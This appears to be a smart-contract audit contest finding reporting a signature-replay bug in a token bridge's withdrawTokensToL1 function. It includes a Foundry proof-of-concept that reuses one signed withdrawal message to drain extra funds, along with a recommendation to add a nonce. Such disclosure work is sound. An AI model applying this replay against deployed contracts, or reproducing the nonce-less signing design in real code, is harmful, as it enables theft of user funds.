Submission Details
Severity:
Reuse withdraw message
Summary
User can reuse withdraw message many time.
Vulnerability Details
User can reuse signed withdraw message many time to withdraw fund more than actual deposited
Poc:
function testUserCanReuseMessageManyTime() public {
// transfer extra amount to vault
vm.prank(deployer);
token.transfer(address(vault), 10e19);
// deposit money - 10e18
vm.startPrank(user);
uint256 depositAmount = 10e18;
token.approve(address(tokenBridge), depositAmount);
tokenBridge.depositTokensToL2(user, userInL2, depositAmount);
(uint8 v, bytes32 r, bytes32 s) = _signMessage(
_getTokenWithdrawalMessage(user, depositAmount),
operator.key
);
// withdraw 1
tokenBridge.withdrawTokensToL1(user, (depositAmount), v, r, s);
// submit message withdraw again
tokenBridge.withdrawTokensToL1(user, (depositAmount), v, r, s);
// again
tokenBridge.withdrawTokensToL1(user, (depositAmount), v, r, s);
console2.log(token.balanceOf(address(user)));
vm.stopPrank();
}
Impact
User can submit withdraw with 1 message til drain vault
Tools Used
Foundry & Manual review
Recommendations
Add nonce in message withdraw to sign.
Updates
Lead Judging Commences
0xnevi almost 2 years ago
Submission Judgement Published Assigned finding tags:
withdrawTokensToL1()/sendToL1(): signature replay
Rewards breakdown
nSLOC
99This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.